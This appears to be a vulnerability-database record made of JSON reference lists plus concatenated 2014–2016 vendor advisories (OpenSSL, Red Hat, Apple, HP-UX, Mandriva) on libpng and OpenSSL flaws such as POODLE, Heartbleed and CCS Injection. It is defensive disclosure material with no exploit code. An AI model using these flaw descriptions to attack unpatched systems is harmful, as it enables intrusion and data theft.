{ "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-affect-ibm-netezza-analytics/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-affect-ibm-netezza-analytics-for-nps/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-jre-8-0-1-1-affect-ibm-netezza-platform-software-clients/" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2016-0448" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7575" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-7575" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2016-0483" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2016-0402" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2016-0466" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2016-0494" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0448" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0466" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0483" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5041" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2015-7981" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8540" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0494" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2015-5041" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7981" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0402" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-8540" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10148" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2596" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2861-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=43094" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-0100.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0475" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-0098.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0475" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-0099.html" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/libpng/1.2.51-0ubuntu3.15.04.2" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2861-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/libpng/1.2.51-0ubuntu3.15.10.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/libpng/1.2.46-3ubuntu4.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/libpng/1.2.50-1ubuntu2.14.04.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4882" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4903" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4872" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4844" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4806" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3449" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0363" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0264" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4871" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4860" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4893" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4871" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0376" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4803" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0376" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4860" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4842" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4843" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4903" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4805" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4902" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4810" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4805" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4893" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3443" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0363" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4882" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4842" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4843" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4810" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4902" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4872" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0686" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4803" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4806" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4844" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5006" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5006" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0687" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0264" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#appendixjava" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206171" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" } ], "sources": [ { "db": "VULHUB", "id": "VHN-86433" }, { "db": "VULMON", "id": "CVE-2015-8472" }, { "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "db": "PACKETSTORM", "id": "135555" }, { "db": "PACKETSTORM", "id": "135556" }, { "db": "PACKETSTORM", "id": "135557" }, { "db": "PACKETSTORM", "id": "135153" }, { "db": "PACKETSTORM", "id": "134719" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "135341" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "134874" }, { "db": "CNNVD", "id": "CNNVD-201512-189" }, { "db": "NVD", "id": "CVE-2015-8472" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-86433" }, { "db": "VULMON", "id": "CVE-2015-8472" }, { "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "db": "PACKETSTORM", "id": "135555" }, { "db": "PACKETSTORM", "id": "135556" }, { "db": "PACKETSTORM", "id": "135557" }, { "db": "PACKETSTORM", "id": "135153" }, { "db": "PACKETSTORM", "id": "134719" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "135341" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "134874" }, { "db": "CNNVD", "id": "CNNVD-201512-189" }, { "db": "NVD", "id": "CVE-2015-8472" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-21T00:00:00", "db": "VULHUB", "id": "VHN-86433" }, { "date": "2016-01-21T00:00:00", "db": "VULMON", "id": "CVE-2015-8472" }, { "date": "2016-01-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "date": "2016-02-02T16:43:57", "db": "PACKETSTORM", "id": "135555" }, { "date": "2016-02-02T16:44:07", "db": "PACKETSTORM", "id": "135556" }, { "date": "2016-02-02T16:44:12", "db": "PACKETSTORM", "id": "135557" }, { "date": "2016-01-07T00:11:25", "db": "PACKETSTORM", "id": "135153" }, { "date": "2015-12-10T00:39:51", "db": "PACKETSTORM", "id": "134719" }, { "date": "2016-07-18T19:51:43", "db": "PACKETSTORM", "id": "137932" }, { "date": "2016-01-21T14:47:53", "db": "PACKETSTORM", "id": "135341" }, { "date": "2016-03-22T15:18:02", "db": "PACKETSTORM", "id": "136346" }, { "date": "2015-12-16T20:23:10", "db": "PACKETSTORM", "id": "134874" }, { "date": "2015-12-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201512-189" }, { "date": "2016-01-21T15:59:00.117000", "db": "NVD", "id": "CVE-2015-8472" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-04T00:00:00", "db": "VULHUB", "id": "VHN-86433" }, { "date": "2017-11-04T00:00:00", "db": "VULMON", "id": "CVE-2015-8472" }, { "date": "2016-05-31T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "date": "2021-05-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201512-189" }, { "date": "2017-11-04T01:29:12.600000", "db": "NVD", "id": "CVE-2015-8472" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201512-189" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "libpng of png_set_PLTE Buffer overflow vulnerability in functions", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006846" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201512-189" } ], "trust": 0.6 } }
var-201410-1144
Vulnerability from variot
Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure. OpenSSL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. OpenSSL prior to 0.9.8zc, 1.0.0o, and 1.0.1j are vulnerable. This could be exploited in a Denial Of Service attack. This issue affects OpenSSL 1.0.1 server implementations for both SSL/TLS and DTLS regardless of whether SRTP is used or configured. Implementations of OpenSSL that have been compiled with OPENSSL_NO_SRTP defined are not affected.
This issue was reported to OpenSSL on 26th September 2014, based on an original issue and patch developed by the LibreSSL project. Further analysis of the issue was performed by the OpenSSL team.
The fix was developed by the OpenSSL team.
This issue was reported to OpenSSL on 8th October 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
SSL 3.0 Fallback protection
Severity: Medium
OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications to block the ability for a MITM attacker to force a protocol downgrade.
Some client applications (such as browsers) will reconnect using a downgraded protocol to work around interoperability bugs in older servers. This could be exploited by an active man-in-the-middle to downgrade connections to SSL 3.0 even if both sides of the connection support higher protocols. SSL 3.0 contains a number of weaknesses including POODLE (CVE-2014-3566).
https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00 https://www.openssl.org/~bodo/ssl-poodle.pdf
Support for TLS_FALLBACK_SCSV was developed by Adam Langley and Bodo Moeller.
Build option no-ssl3 is incomplete (CVE-2014-3568)
Severity: Low
When OpenSSL is configured with "no-ssl3" as a build option, servers could accept and complete a SSL 3.0 handshake, and clients could be configured to send them.
This issue was reported to OpenSSL by Akamai Technologies on 14th October 2014.
The fix was developed by Akamai and the OpenSSL team.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20141015.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2014:1692-01 Product: Red Hat Storage Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1692.html Issue date: 2014-10-22 CVE Names: CVE-2014-3513 CVE-2014-3567 =====================================================================
- Summary:
Updated openssl packages that contain a backported patch to mitigate the CVE-2014-3566 issue and fix two security issues are now available for Red Hat Storage 2.1.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Storage Server 2.1 - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
This update adds support for the TLS Fallback Signaling Cipher Suite Value (TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade attacks against applications which re-connect using a lower SSL/TLS protocol version when the initial connection indicating the highest supported protocol version fails.
This can prevent a forceful downgrade of the communication to SSL 3.0. The SSL 3.0 protocol was found to be vulnerable to the padding oracle attack when using block cipher suites in cipher block chaining (CBC) mode. This issue is identified as CVE-2014-3566, and also known under the alias POODLE. This SSL 3.0 protocol flaw will not be addressed in a future update; it is recommended that users configure their applications to require at least TLS protocol version 1.0 for secure communication.
For additional information about this flaw, see the Knowledgebase article at https://access.redhat.com/articles/1232123
A memory leak flaw was found in the way OpenSSL parsed the DTLS Secure Real-time Transport Protocol (SRTP) extension data. (CVE-2014-3567)
All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to mitigate the CVE-2014-3566 issue and correct the CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Package List:
Red Hat Storage Server 2.1:
Source: openssl-1.0.1e-30.el6_6.2.src.rpm
x86_64: openssl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-3513 https://access.redhat.com/security/cve/CVE-2014-3567 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/1232123
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUR/NUXlSAg2UNWIIRAlZHAJwPwsoiJDn5RhI6U8eFkIzxyQopkQCePynp RpfQCptdJIpd6WXO7pw1vVo= =T20t -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.
This update adds support for Fallback SCSV to mitigate this issue. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-09-16-2 Xcode 7.0
Xcode 7.0 is now available and addresses the following:
DevTools Available for: OS X Yosemite v10.10.4 or later Impact: An attacker may be able to bypass access restrictions Description: An API issue existed in the apache configuration. This issue was addressed by updating header files to use the latest version. CVE-ID CVE-2015-3185 : Branko Aibej of the Apache Software Foundation
IDE Xcode Server Available for: OS X Yosemite 10.10 or later Impact: An attacker may be able to access restricted parts of the filesystem Description: A comparison issue existed in the node.js send module prior to version 0.8.4. This issue was addressed by upgrading to version 0.12.3. CVE-ID CVE-2014-6394 : Ilya Kantor
IDE Xcode Server Available for: OS X Yosemite v10.10.4 or later Impact: Multiple vulnerabilties in OpenSSL Description: Multiple vulnerabilties existed in the node.js OpenSSL module prior to version 1.0.1j. CVE-ID CVE-2014-3513 CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
IDE Xcode Server Available for: OS X Yosemite v10.10.4 or later Impact: An attacker with a privileged network position may be able to inspect traffic to Xcode Server Description: Connections to Xcode Server may have been made without encryption. This issue was addressed through improved network connection logic. CVE-ID CVE-2015-5910 : an anonymous researcher
IDE Xcode Server Available for: OS X Yosemite v10.10.4 or later Impact: Build notifications may be sent to unintended recipients Description: An access issue existed in the handling of repository email lists. This issue was addressed through improved validation. CVE-ID CVE-2015-5909 : Daniel Tomlinson of Rocket Apps, David Gatwood of Anchorfree
subversion Available for: OS X Yosemite v10.10.4 or later Impact: Multiple vulnerabilities existed in svn versions prior to 1.7.19 Description: Multiple vulnerabilities existed in svn versions prior to 1.7.19. These issues were addressed by updating svn to version 1.7.20. CVE-ID CVE-2015-0248 CVE-2015-0251
Xcode 7.0 may be obtained from: https://developer.apple.com/xcode/downloads/
To check that the Xcode has been updated:
- Select Xcode in the menu bar
- Select About Xcode
- The version after applying this update will be "7.0".
Release Date: 2014-10-28 Last Updated: 2014-10-28
Potential Security Impact: Remote Denial of Service (DoS), unauthorized access, man-in-the-middle (MitM) attack
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running OpenSSL.
This is the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely to allow disclosure of information.
References:
CVE-2014-3566 Man-in-th-Middle (MitM) attack CVE-2014-3567 Remote Unauthorized Access CVE-2014-3568 Remote Denial of Service (DoS) SSRT101767
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before v0.9.8zc
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3567 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2014-3568 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates to resolve these vulnerabilities. The updates are available from the following ftp site.
ftp://ssl098zc:Secure12@ftp.usa.hp.com
User name: ssl098zc Password: (NOTE: Case sensitive) Secure12
HP-UX Release HP-UX OpenSSL version
B.11.11 (11i v1) A.00.09.08zc.001_HP-UX_B.11.11_32+64.depot
B.11.23 (11i v2) A.00.09.08zc.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3) A.00.09.08zc.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08zc or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zc.001 or subsequent
HP-UX B.11.23
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zc.002 or subsequent
HP-UX B.11.31
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zc.003 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 28 October 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2015:062 http://www.mandriva.com/en/support/security/
Package : openssl Date : March 27, 2015 Affected: Business Server 2.0
Problem Description:
Multiple vulnerabilities has been discovered and corrected in openssl:
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment (CVE-2010-5298).
The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566). NOTE: this issue became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c (CVE-2014-8275).
